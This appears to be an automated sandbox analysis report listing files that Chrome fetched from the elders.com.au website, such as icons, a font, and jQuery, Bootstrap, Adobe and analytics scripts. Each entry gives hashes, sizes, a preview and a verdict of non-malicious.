                                                                                                                                    SHA-256:564DEFC382B32EDEC8C768509535C12EE88121B419D5B16C07F281DE92FA6599
                                                                                                                                    SHA-512:09394873ADF78A8A483D0EF582EE567476271C9125C0C77B12D693A5C831D72746796DA41B257113FF9FE6A49F010520C6B8B04F40EA7D0382FA1888F8623C99
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/teamwork-icon.png
                                                                                                                                    Preview:.PNG........IHDR..............l}.....pHYs..2...2..(dZ.....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 137.da4a7e5, 2022/11/27-09:35:03 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.1 (Windows)" xmp:CreateDate="2023-01-27T17:24:54+10:30" xmp:ModifyDate="2023-01-27T17:36:46+10:30" xmp:MetadataDate="2023-01-27T17:36:46+10:30" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:965dcbe0-aadc-a34e-840f-84c2126aec49" xmpMM:DocumentID="adobe:docid:photoshop:1149732c-1da8-364c-90fb-7ef8f325988c" xmpMM:OriginalDocumentID="xmp.did:bcbcf
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 384 x 384, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):12378
                                                                                                                                    Entropy (8bit):7.909076338338389
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:384:Muvw/P18FkjHOnr8TLhMOEJRm4Z4NBSQoeydWcKFkj:M7d82jHOnrkSzJRuNIReywF4
                                                                                                                                    MD5:1D137F6E42BD3F8A9482EAFB0C92D735
                                                                                                                                    SHA1:2A06B145558B7DB2502F7DB1FF0DBEA57E8F92E0
                                                                                                                                    SHA-256:448CA01DBDB41B4957CFF33D67FB0743EE954D78ACA68670F08851096626A95F
                                                                                                                                    SHA-512:9FA0FB01BDC3BA93D6D67292F8174CE7647F318105BC39B53829087C105661C286A304125A52800DAC6F88EC80686777FFDBEEDF8FF17610C46E51506FE144C6
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://upload.wikimedia.org/wikipedia/commons/thumb/4/42/Adobe_Acrobat_DC_logo_2020.svg/384px-Adobe_Acrobat_DC_logo_2020.svg.png
                                                                                                                                    Preview:.PNG........IHDR....................gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD..............tIME.....)4*6.p../^IDATx...w..U.....I..{i...".."E.....kA]{.E..W...Z.w.U,....*..H....d...H......y|TH2.sN..9...C..U...9.34p..,....T.R....@Y.."........Z...V.....h`q0.wf....!LV...T....K...5....x..RZj,..oq..(.d..-..t(...+..s.i,=.#v...$B..j....F.5... iE..G[..X..jjL.H....g...z...)..`{%...K..../"ixp..x.Z^.........)....\.t&....l..F[.Sy.........*s...F.O"........".....0T@_,w..5vD$K.....^H. H..(........H.[b..2..R.......)..46D$G...?o.3r2.lm..o..c.;..x......\...O..e)..P....e.......pqp._'{.NR..!PT...2J._D....2....,.e..`{>...Ht......).8.\!K.f......|../".WG.0%T..Y...|n....U."".T..>..sk.7..S@...|...P......B.H."s...[.J......DD.2".G....i......e.p..MD..S..=.&.m.....|..........G...5i.....!.Q.>"".23h.f6.....W@.&.B.>S...I..B..mu*.E.X...3.CG...H.+...a.... ...}DD..@.P>/.4.B..~./"....{.X.....s.....~..I....ldh..`[.u].T..._D$..E..., ..) .y.e....HZ...{..R8..(..^.sO
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (2345)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):200761
                                                                                                                                    Entropy (8bit):5.529022034916857
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:QPwizDGLETrtJA0f5yptcY0/H8+bEQDmKD0C8rT/Xy:qGLgrtPYjWx0C8rT/i
                                                                                                                                    MD5:4EBCD0AF5BBAF22E70D238B1DA7645E1
                                                                                                                                    SHA1:3DF411D4F0AE4B7DC6B3D9E0AB007A0333E0951C
                                                                                                                                    SHA-256:3A3535D12E9EB99FDCF499FA1F3AB7BA380EB74A3D9A3D80A3E5CC5FF9A9C04A
                                                                                                                                    SHA-512:106D1662051062ECF67962F933D4085956C75226C393A4F885EE30D802EA953D49ACE9FFC8BD523402003D2018199FD1181CCDC482B8F7107BF000F1F5431297
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"},{"function":"__u","vtp_component":"URL","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"HOST","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__u","vtp_component":"PATH","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__f","vtp_component":"URL"},{"function":"__e"}],. "tags":[{"function":"__mf","metadata":["map"],"once_per_event":true,"vtp_projectId":"b953cf15-e568-418d-a9cb-1ea0cf6357a5","tag_id":4}],. "predicates":[{"function":"_eq","arg0":["macro",0],"arg1":"gtm.js"}],. "rules":[[["if",0],["add",0]]].},."runtime":[ [50,"__e",[46,"a"],[36,[13,[41,"$0"],[3,"$0",["require","internal.getEventData"]],["$0","event"]]]]. ,[50,"__mf",[46,"a"],[41,"h"],[52,"b",["require","createQueue"]],[52,"c",["require","inj
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):5538
                                                                                                                                    Entropy (8bit):4.855074843571827
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:96:9J4o/vHtcZfoRUGSA8a32BtT3lh2toLZU6KJyaz8G0Y:T1vHsfoRfSA8y2B93lh2toLZV+yaz2Y
                                                                                                                                    MD5:6ECA9F97D2E4B34F7B8C85B49887C474
                                                                                                                                    SHA1:3155098A09A2D8BAE294A044C3D82452BDDC6CBC
                                                                                                                                    SHA-256:A5C392E142DD1D80325021AD4497F87E97372DA8819D04C63EB09132D8C0EE25
                                                                                                                                    SHA-512:A86FFEFF1FF65DF109EA2CA6098B533D8D6F4BCD98A7604E247E93EDE7161B903D9B52C05F460F061E99D4573CCEC36AF94618A2BC0BAA4F7B7F2D4227FF0F55
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/.rum/@adobe/helix-rum-js@%5E2/dist/rum-standalone.js
                                                                                                                                    Preview:/*. * Copyright 2024 Adobe. All rights reserved.. * This file is licensed to you under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License. You may obtain a copy. * of the License at http://www.apache.org/licenses/LICENSE-2.0. *. * Unless required by applicable law or agreed to in writing, software distributed under. * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS. * OF ANY KIND, either express or implied. See the License for the specific language. * governing permissions and limitations under the License.. */..// /* eslint-disable max-classes-per-file */.(function () {. 'use strict';.. /* eslint-env browser */. function sampleRUM(checkpoint, data) {. // eslint-disable-next-line max-len. const timeShift = () => (window.performance ? window.performance.now() : Date.now() - window.hlx.rum.firstReadTime);. try {. window.hlx = window.hlx || {};. sampleRUM.enhance =
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (760)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):101682
                                                                                                                                    Entropy (8bit):5.4801097429116385
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:uyefSIz4emwRsSragavOIYdD3ise8Ux+rHi:uPfTz4emSD3o8Ux+rHi
                                                                                                                                    MD5:F9E8E8C279BAF6A1A278042AFE4F395A
                                                                                                                                    SHA1:D2631D76F948170994789F4C449098EF8A1160AE
                                                                                                                                    SHA-256:AC9C69C1F6DF29993331F7E3F9B7EC6D343575D60F4A5795456422E33BCF15D2
                                                                                                                                    SHA-512:24DA116ACBB4BCCE90B5DB29BAD1B65E84401E97358194A688C75ABC3AB34D4AEB4A2F918A3E15B42BB715FA160827A06FEBC33E8C382BA8058DB58DF3A159D5
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*. jQuery JavaScript Library v1.12.4-aem. http://jquery.com/.. Includes Sizzle.js. http://sizzlejs.com/.. Copyright jQuery Foundation and other contributors. Released under the MIT license. http://jquery.org/license.. Date: 2016-05-20T17:17Z. Sizzle CSS Selector Engine v2.2.1. http://sizzlejs.com/.. Copyright jQuery Foundation and other contributors. Released under the MIT license. http://jquery.org/license.. Date: 2015-10-17. jQuery requestAnimationFrame - 0.2.2 - 2016-10-26. https://github.com/gnarf37/jquery-requestAnimationFrame. Copyright (c) 2016 Corey Frang; Licensed MIT */.(function(y,na){"object"===typeof module&&"object"===typeof module.exports?module.exports=y.document?na(y,!0):function(ja){if(!ja.document)throw Error("jQuery requires a window with a document");return na(ja)}:na(y)})("undefined"!==typeof window?window:this,function(y,na){function ja(a){var b=!!a&&"length"in a&&a.length,d=c.type(a);return"function"===d||c.isWindow(a)?!1:"array"===d||0===b||"number"===typeof b
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):705
                                                                                                                                    Entropy (8bit):7.543354064069374
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/74/6Ts/ljgs1Xq8Fwa+SJ/1Kl69d1VG5oKanYqMwC4+pKfzeVBNAQcE:x/6Og+qwJgl69dK5bCYcCVOE
                                                                                                                                    MD5:CADBD6B75F35FF2B2E5CCF257A9975C6
                                                                                                                                    SHA1:BDB1EB15DEB30A22E4C1E2B76C61F28B64EAEB43
                                                                                                                                    SHA-256:A4B5CE886DED1D9DBF02BD1D499988306F756B0BA1CAA0CB2AF772AFDA38986C
                                                                                                                                    SHA-512:5A56C890F4AD372FE01C64F26E78DC645F6BF7AC68DFA9F95BA199A16DDE87A06D17DE46C051EA7D860964FC11C19C4149C5F824B20D9B5A3C4E9FA08E62EC35
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....VIDATx..VMn.P..yv.........#...;v..BN@9A..Jo.n....d.....f..)H%. y.<.4.......73o.{c#,.a........F@Cm%.... ..0..A....m6..C.......H.....H..ov.........".....M...>.:0M...x....?*..y}w...W.3.T....z}7...?..[.smk.....0.b.77.m...t.lZ|.NJG$...&.Z....2. g:..d..1...5.y.b..WX....s7](.W..GI.=.l/....vtD.........p.)3nE..V..!....#..f.(5..l[..V+f.SF....P"...o./U 8..w......T&N.f....@...H....a......w..=.t..E..L.,.Y..W'..s..S`..=mZq.._....y..z...Z..E".S._pO..5.K&SM..9....27....}..49.y.T[Q4..L..AR...;.C7"....$..6E.n..sN..kB..}.u...B_..pB.N.g..N.L.g.8P.JW ...w.(.m..&<.Z......V.M.#.u.kH...9P.?....jX.....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (32730)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):430018
                                                                                                                                    Entropy (8bit):5.371844747679136
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12288:751zU/u3sgauHSp0H/G3KFVbHvbQncHPGXj:jcucgauHSpnKFVbHvbQncHPO
                                                                                                                                    MD5:877956833EDC7A947734722C9A3BBB84
                                                                                                                                    SHA1:D2703300A2084FBCF3D596FBCC0C4A6007AD2BA3
                                                                                                                                    SHA-256:34BAB527C6284CA8AD76C206BD6BDCE43E7A587652A544F7D673542B266B1CFC
                                                                                                                                    SHA-512:4DF7ED6845552642CB79F956278150FFD71DBB85E8558919DC3144C6CEEE569DCADEA9BBD93719FC21697622FCF4741E63EACD696A6A7737BB2CC79B7B08CA5D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.min.js
                                                                                                                                    Preview:// For license information, see `https://assets.adobedtm.com/728d44811931/14db0b582053/launch-f5e74cc94fc9.js`..window._satellite=window._satellite||{},window._satellite.container={buildInfo:{minified:!0,buildDate:"2024-08-29T04:29:57Z",turbineBuildDate:"2024-08-22T17:32:44Z",turbineVersion:"28.0.0"},environment:{id:"EN4406273eae824fa9a4a08164ecb82367",stage:"production"},dataElements:{"Interaction Link (custom)":{forceLowerCase:!0,cleanText:!0,modulePath:"core/src/lib/dataElements/customCode.js",settings:{source:function(e){if(e&&e.component&&e.component.hasOwnProperty("interactionLink"))return e.component.interactionLink}}},"DOM | Link URL":{cleanText:!0,modulePath:"core/src/lib/dataElements/domAttribute.js",settings:{elementProperty:"href",elementSelector:"#container-5cd4c0bcf1 > div > div > div > div.header--container.has-utility > div.header--utility-container > ul > li:nth-child(1) > a"}},"ACDL | branchName":{cleanText:!0,modulePath:"core/src/lib/dataElements/customCode.js",setti
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):72130
                                                                                                                                    Entropy (8bit):5.606238239604008
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:1536:bfu0/93VQ/kdM5WoSwQCV7nh7lI2ibrrc6uFYk/xIDJCOqmqM1AmLMF4Ld2wPECS:Tu0/93QWFZyptL
                                                                                                                                    MD5:91D20120E7FE55850F031200600F53AE
                                                                                                                                    SHA1:93E3313248FF84E43025EB243AE964AF730A0BC3
                                                                                                                                    SHA-256:9F46BB6E66AFE1B40CC7E1FB7DE4A38E5D6FB27C4BDA7B986B0469817055A299
                                                                                                                                    SHA-512:7E2219E7438984160733B0B01711373596C4D483AFA78742BC21D24EF71D051F0B72B97BCEB37DBC976907797B6E900241ECD2D01EEA61BD2C7FFCCABC256325
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:var mouseflowDisableKeyLogging = true;if(typeof mouseflow==='undefined'&&typeof mouseflowPlayback==='undefined'){(function(){var _204=false;var _193=false;var _200=[];var _196=[];var _20='https://us.mouseflow.com';function _7(_341,_151){_151=(typeof _151!=='undefined'?_151:'');if(_4.debug)console.log('MF'+(_4.includeDebugTime?' - '+_151:'')+': '+_341)}var _60=new _397(window);var _34=new _376(window);var _5=new _383(window,Math,JSON,_60);var _13=new _372(_60,_5);var _36=new _285('local',window,_5,_7);var _304=new _285('session',window,_5,_7);var _276=new _336(window);var _4=new _359(window,_36,_204,_193);_4._100();_4._208=[];_4._174=[];_4._117=[];_4._173=[];_4._419=[];_4._418=[];_4._71='b953cf15-e568-418d-a9cb-1ea0cf6357a5';_4._417=true;_4._416=false;_4._415='5242000';_4._161('appUrl',_20);var _295=new _342(window,_5,_4,_7);function _305(_0,_4,_53,_5,_13,_76,_36){var _20,_71,_7,_56;var _194='mf_liveHeatmaps';var _15;var _119=[];var _89;var _137=false;function _46(_164,_122,_176,_112){_
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):484
                                                                                                                                    Entropy (8bit):7.273009315077355
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/74/6Ts/DGh50phHoEkw3Anh550FU50gmK8E+4cIV0FdDy:x/6G8gWEkiE5yFTgT+BW0FdDy
                                                                                                                                    MD5:F41040006C5AC677120F5F6E53803F24
                                                                                                                                    SHA1:A360910A5BCDFD5840DFAA31F05E0E768A63125F
                                                                                                                                    SHA-256:E6EF3FB8A35B4F9B01BEB6EFFDC6CDBA1E5CE5A250C528341047F9884BC0611C
                                                                                                                                    SHA-512:AA20C46A3651139B30C1A8D15B058C87907C1B08CFACB0C3A769FF3D9190E59E65FE0A5BDEE8B21A357C71CBDBADD704B16825C33A01467FAF04BD2B12068F40
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....yIDATx..KN.0..g.,X.!!...$.....z....d.#.......... a....T...*!.E}$..~R....o....]0.&...!.AR...._...vHY..5.f..2....~.4.....|*.K...v{....P.CA5x...jb$..U.m.....jb\Q..[...9@..jb-.d....`V.......t.Ld...2..K....wqq.).U..$J.$.z.8.l>?..",.%I.....".0.[..$*Q5x.(..u/U}.)..Ra3nM.. .4z....vQ'(.ck.....<_#..M"Q5wJ..._.kf.N..a.....}@.}..:.x.Y9i...h.4...4m.}E)...G.'.h.F.-.1..L^}.5..<...r....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (65472)
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):151775
                                                                                                                                    Entropy (8bit):5.310612558975077
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:7RwVezu8jPgro1A29AaiWqSrdNgKTPhB/B1pLD:7RwsuuPgroSEBiNSR7B/R
                                                                                                                                    MD5:46A2DF1A9BFAEEFFBD5B53738ED986E6
                                                                                                                                    SHA1:D60EA1E3103A34CD5AB43950A9559F2DE478F769
                                                                                                                                    SHA-256:90A2617361565EFD206F9AAD7188BB03F52B7CE94143CA44E51C5F85C861D384
                                                                                                                                    SHA-512:52F105577E6A6D7128A270B81C6520DF57A181C36938DEA5BCBF4A93D6CFF832BBFD468C9D9A9847271ACA4AB4FD2ACF6D779B05C90F10342176B9EF33A3AC2D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-site.lc-46a2df1a9bfaeeffbd5b53738ed986e6-lc.min.js
                                                                                                                                    Preview:/*! For license information please see site.js.LICENSE.txt */.!function(){var e={616:function(e,t){var n;!function(t,n){"use strict";"object"==typeof e.exports?e.exports=t.document?n(t,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return n(e)}:n(t)}("undefined"!=typeof window?window:this,(function(r,o){"use strict";var i=[],a=Object.getPrototypeOf,s=i.slice,l=i.flat?function(e){return i.flat.call(e)}:function(e){return i.concat.apply([],e)},c=i.push,u=i.indexOf,d={},p=d.toString,f=d.hasOwnProperty,h=f.toString,m=h.call(Object),g={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},b=r.document,w={type:!0,src:!0,nonce:!0,noModule:!0};function x(e,t,n){var r,o,i=(n=n||b).createElement("script");if(i.text=e,t)for(r in w)(o=t[r]||t.getAttribute&&t.getAttribute(r))&&i.setAttribute(r,o);n.head.appendChild(i).parentNode.removeChild(i)}function L(e){return nu
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:TrueType Font data, 15 tables, 1st "FFTM", 44 names, Macintosh
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):221644
                                                                                                                                    Entropy (8bit):5.50717267650127
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:T2c9voG1Y1101457Im/wefpzxny+2f9YLcpzlIZF0BfB4M:MG8q1457FTpdny+mHIZF0lN
                                                                                                                                    MD5:049592BE7C0484EA3BD978616A1CF3C4
                                                                                                                                    SHA1:94970D5D4FD1F696D09E2C105EB4E7A8F2ADA576
                                                                                                                                    SHA-256:2CD32007EAF913C0286165205B98488D17E7B61242925B4FD4D2694CDB23AD49
                                                                                                                                    SHA-512:0502F3727BAAD8602087D48F11B87171960C4530D1BE64818509F1787C027DBDDEDB50E40AE458E304798384E0BDE6E9088727103E3ABC91E3E7A23EF0C8482F
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-react/resources/static/media/Meta-Pro-Medium.afe5599c.ttf
                                                                                                                                    Preview:...........pFFTM..D...a.....GDEF).-...!....fGPOS.g...B.....GSUB.|.>..!t..!lOS/2.Sq....x...`cmap............gasp......!.....glyf)w....#.....head..J........6hhea...j...4...$hmtx.u.........locau1.........`maxp.......X... name.h....... =post.H........,.........8*\._.<...................d[.=.....a.........................=...............................................@.........&.........c.......c.....W..................P. {........MONO..............." .............. ...,.B.....M...........(.K...K.6.#.M.-.L.#...7...K.9.7.:.......b.7.$.7.I.7...A...7.<.7...-.1.7...#.!.#...7.J.<...#.U.7.;.7.1.K.C.K.z.....7.y.-...-...7.K...c.U.A.7.w.U...U...U...7.|.U. .U.%...E.U...U.:.A...U...7.5.U...7.G.U.U.2.......P.8...:...&.........-.+.U.....+...b.7.....D.#...2.7.H...7.5.7...7.=.&.".-.>.K...E.......J...K.(.C.,.B.#.2.5.K.5.7.^.C...(.U...(.P...................(.f.....U.f...6.7.....'.K...7.P.-.....8.....U.2.-...7.R.7...(...#...7.I.7.R.7.c.....#...7...-.}.-.D.#.'.P._.#...A.(.7.P.-...(...#...-...-...-...A.K..
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with very long lines (61608)
                                                                                                                                    Category:dropped
                                                                                                                                    Size (bytes):61893
                                                                                                                                    Entropy (8bit):5.140561960215685
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:768:NsO4MAvAcCfFvM6aPMPv3Mo8ExbxHTVCLXMrJ3u6byVm7MT2NIbjyixM3XpZWVe8:NDaWkNo9s3Ccd
                                                                                                                                    MD5:FC0AE1E61D12D522D67E845F4BDEBDF4
                                                                                                                                    SHA1:961BA292AC8C68C7383956C7CBCD929CAF64BD24
                                                                                                                                    SHA-256:1BBDB19132CECE5103C0A2919E09320EDC6687AB3879FC3BB1D28F0F0FA5D45F
                                                                                                                                    SHA-512:9A9DD578CA6E14A6E0C66FD731453841051C257E0065F5797AC817EF6250AFB1FBCD6BAC57A94B3F54BBF306675F6CFD770BF2C22975547907640A9F18E5BB37
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    Preview:/*!. * Bootstrap v5.0.0-beta3 (https://getbootstrap.com/). * Copyright 2011-2021 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/main/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e(require("@popperjs/core")):"function"==typeof define&&define.amd?define(["@popperjs/core"],e):(t="undefined"!=typeof globalThis?globalThis:t||self).bootstrap=e(t.Popper)}(this,(function(t){"use strict";function e(t){if(t&&t.__esModule)return t;var e=Object.create(null);return t&&Object.keys(t).forEach((function(s){if("default"!==s){var i=Object.getOwnPropertyDescriptor(t,s);Object.defineProperty(e,s,i.get?i:{enumerable:!0,get:function(){return t[s]}})}})),e.default=t,Object.freeze(e)}var s=e(t);const i=t=>{do{t+=Math.floor(1e6*Math.random())}while(document.getElementById(t));return t},n=t=>{let e=t.getAttribute("data-bs-target");if(!e||"#"===e){let s=t.getAttribut
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):291981
                                                                                                                                    Entropy (8bit):5.1014349996806985
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3072:LYUdwzo64+dguiv6jk5zb5Dp1p3vAKK8kOk9UTX261IK:LYUdwzo64+du6jk5z1Dp1eVOLT71IK
                                                                                                                                    MD5:E592021EAFD59DE123415AB937A09F08
                                                                                                                                    SHA1:95C6AA47BA749A69830B1D3918303835654F4D75
                                                                                                                                    SHA-256:9ADC4D1EFBC0737998D624B6168CF38F1A241E3D22898942C9C3654C460419CD
                                                                                                                                    SHA-512:A3128F9AEE8B298500A85C4AA6FF24CAEC11A6AE15A84F4E2B0A9BE999B4B5640DBE2B02696EDD485437ADE448BF4BD3E22980E1DD2C2B34C6587327A6D1EDFA
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js
                                                                                                                                    Preview:/*******************************************************************************. * Copyright 2019 Adobe. *. * Licensed under the Apache License, Version 2.0 (the "License");. * you may not use this file except in compliance with the License.. * You may obtain a copy of the License at. *. * http://www.apache.org/licenses/LICENSE2.0. *. * Unless required by applicable law or agreed to in writing, software. * distributed under the License is distributed on an "AS IS" BASIS,. * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.. * See the License for the specific language governing permissions and. * limitations under the License.. ******************************************************************************/../**. * Element.matches(). * https://developer.mozilla.org/enUS/docs/Web/API/Element/matches#Polyfill. */.if (!Element.prototype.matches) {. Element.prototype.matches = Element.prototype.msMatchesSelector || Element.prototype.webkitMatchesSelector;.}..//
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):742
                                                                                                                                    Entropy (8bit):7.590595547266891
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:12:6v/74/6Ts/dlM5u+Y+4FJZbJ/LhxMAr4VR5y+rsvvEj5CUSqn4gYFkS:x/6yF+YzFXb5FUgyhj7Sq4FkS
                                                                                                                                    MD5:F689837001E04872E27AA17763C2FF85
                                                                                                                                    SHA1:EAED81B5AA6C21C5A021227E327300985F1E0E13
                                                                                                                                    SHA-256:53E7E3A1A0D4EDF842A4D3F28C1853E474A58013F6F54C48C631E99A3FF7DF5F
                                                                                                                                    SHA-512:5EEC37FFB309CE4411DDFE4B4CEDE8A378A7D28844FE54B70CBBC9F210F68E15925DCB0AD50A8697187003D7FD6979F793D86B3631CD7B3CFA0A881CEDB0B71D
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/content/dam/eld/icons---logos/icons/social-share/Instagram.png
                                                                                                                                    Preview:.PNG........IHDR..............w=.....pHYs.................sRGB.........gAMA......a....{IDATx..U.n.@..Yo...)..p.=.4Ar. .qk....7n...h.....O.\{.U.87..P..K...^f..%R.5J.I......of..`.va=.QC.....U..4..4h..4...... &F.X...F..{.i..v.?.m...n.=..$s...D.<...~....8..V~......@... 4...p...n..QM..U..T.6.....N...&.3.I,B...En.......nl..^..OxA..O.3.@.6.^...r.7..}..`..t..oD.._..4..J.Y.h./8&*h......{.u..?wa...9..a ...FBN*k.w%9...Bz.b..y......A./N..B~..^.@X'l......../.tZ..I....g.`.A..eE..Fu....dZ.5.7..h.kg.....?......%Q.Z........"J.....T.Z{09-.S.nE.t}.}.KX...f.D..#..8#....=H.Dts...8.C&.&..#...N!g5.X*...8..@%{d.LU.%H.-...2..tS..J...<.V.V...n>}6$e..%"~.....M...y........`.S.{../?...\.....W.!B.T...AL..rC+Z........".}..V.....IEND.B`.
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):16
                                                                                                                                    Entropy (8bit):3.625
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:UU:UU
                                                                                                                                    MD5:DD9B395C741CE2784096E26619E14910
                                                                                                                                    SHA1:D691792F378240F80919BEDA895262C509D22B75
                                                                                                                                    SHA-256:C084B47104C493FB377B6D35D8C08DF67D773F6DCF8294C0A7360710CD8CACBD
                                                                                                                                    SHA-512:BB9D8EFF819A61A9CE8BDF03336D6E0650DC5F0339843CAD9C8B96C404CA751FB797BECD4D9A1FD24AFD9D6F3FA9B86645E6E8AD8B855C032E80A4F8897B983C
                                                                                                                                    Malicious:false
                                                                                                                                    Reputation:low
                                                                                                                                    URL:https://elders.com.au/etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js
                                                                                                                                    Preview:window.$CQ=_g.$;
                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                    Category:downloaded
                                                                                                                                    Size (bytes):16
                                                                                                                                    Entropy (8bit):3.75
                                                                                                                                    Encrypted:false
                                                                                                                                    SSDEEP:3:H0hCkY:UUkY
                                                                                                                                    MD5:AFB69DF47958EB78B4E941270772BD6A
                                                                                                                                    SHA1:D9FE9A625E906FF25C1F165E7872B1D9C731E78E
